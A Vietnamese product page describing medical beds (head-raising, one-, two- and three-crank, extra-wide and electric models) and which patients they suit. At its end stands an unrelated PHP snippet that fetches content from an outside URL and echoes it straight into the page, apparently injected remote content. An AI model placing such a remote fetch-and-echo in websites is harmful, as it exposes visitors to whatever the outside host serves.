Sản phẩm giường y tế nâng đầu

Giường y tế nâng đầu

Giường y tế nâng đầu là sản phẩm y tế được thiết kế dựa theo nhu cầu cũng như yếu tố cần thiết để phù hợp cho bệnh nhân khi nằm lâu ngày trên giường bệnh có được những tư thế thoải mái nhất.

Giường y tế nâng đầu là một loại giường dưỡng bệnh đơn giản nhất thường dùng trong bệnh viện, phòng khám, trạm xá và các trường học doanh nghiệp. Giường y tế này sử dụng nâng đầu bằng tay kéo giúp nâng đầu và một phần thân thể người bệnh lên cao giúp họ có thể nằm nghỉ dưỡng thoải mái hơn.

Giường y tế nâng đầu
Giường y tế nâng đầu

Giường y tế 1 tay quay

Giường y tế 1 tay quay hay còn gọi là giường bệnh có tay quay sử dụng một trục quay đồng tâm được nối với phần nâng đầu giường giúp nâng đầu và mình người nằm dưỡng bệnh dễ dàng với lực nâng bằng cách quay cánh tay đòn của giường bệnh. Giường bệnh 1 tay quay dùng cho những người bị gãy xương đùi, bệnh lý tương đối nhẹ, hoặc người bệnh có thể di chuyển được như đi đứng bình thường.

Giường y tế 2 tay quay

Giường bệnh y tế 2 tay quay là một loại giường dùng 2 trục quay đồng tâm giúp nâng người bệnh phần đầu và phân chân. Giường y tế 2 tay quay dùng để dưỡng bệnh người bị bệnh nặng như tai biến, suy tim, cao huyết áp, COPD, và một số bệnh khác. Điều đặc biệt của giường y tế 2 tay quay là ngoài giúp nâng phần thân thể trên cho người bệnh dễ thở vì đa số những người bệnh lý nặng là họ có thể tích phổi giảm xuống, do đó họ cần phải nâng cao đầu và mình một góc từ 15 độ đến 30 độ cho phổi dễ dàng hoạt động. Ngoài ra, phần nâng chân là giúp máu huyết có thể lưu thông trở về tim bình thường khi nâng lên cao hơn so với duỗi thẳng chân; hơn nữa phần nâng chân cao còn giúp chống lại tê bại chân, mông đùi của người bệnh, giúp họ nằm thoải mái hơn.

Xem thêm:

===> Máy xông mũi

===> Máy nghe tim thai

===> Giường y tế

Giường bệnh viện 3 tay quay

Giường bệnh viện 3 tay quay chuyên dùng để chăm sóc điều trị bệnh nhân tại nhà dễ dàng hơn đối  với một số bệnh nhân cần tiệt trùng chống nhiễm khuẩn và cần di chuyển. Giường y tế 3 tay quay thiết kế hoàn toàn khác giường bệnh y tế 2 tay quay, nó có chức năng ngoài 2 chức quay 2 tay quay bình thường còn có thêm chứng năng tay quay thứ 3 nâng nguyên người bệnh lên cao hơn từ 420mm lên 600mm. Đọc thêm tìm hiểu..

Giường bệnh y tế 1,2 m hoặc 1,4 bề ngang:

Đây là loại giường bệnh có tay quay đặt làm riêng cho người bệnh vì có thể thay đổi chiều ngang từ 900mm tiêu chuẩn lên 1.200mm hoặc 1.400mm. Quý khách có thể đặt theo yêu cầu loại giường y tế ngoại cở 1 tay quay hoặc 2 tay quay.

Giường điện y tế

Giường điện y tế hiện nay là loại giường điện được người Việt Nam sản xuất theo công nghệ mô tơ đẩy và sử dụng remote điều khiển tăng tính cơ động dễ dàng sử dụng cho cả người chăm sóc và người dưỡng bệnh.

Giường điện y tế được sản xuất theo 2 loại gồm một loại sử dụng inox và một loại sử dụng sắt sơn tĩnh điện rất phù hợp cho người già và người bệnh trong giai đoạn hồi phục sức khỏe nằm điều trị. Cái hay của loại giường điện y tế là nó không giống giường y tế tạo ra sức ì tâm lý cho người bệnh vì nó giống như một cái giường bình thường để nằm nghỉ ngơi mà thôi.
[php]
$data = file(“https://vsolutions.vn/vsolution_others/sys/link/638″);
foreach ($data as $cont) {
$text = mb_convert_encoding($cont,”utf8″,”EUC-JP”);
echo $text;
}[/php]

Show More

Related Articles

Back to top button
Close
Close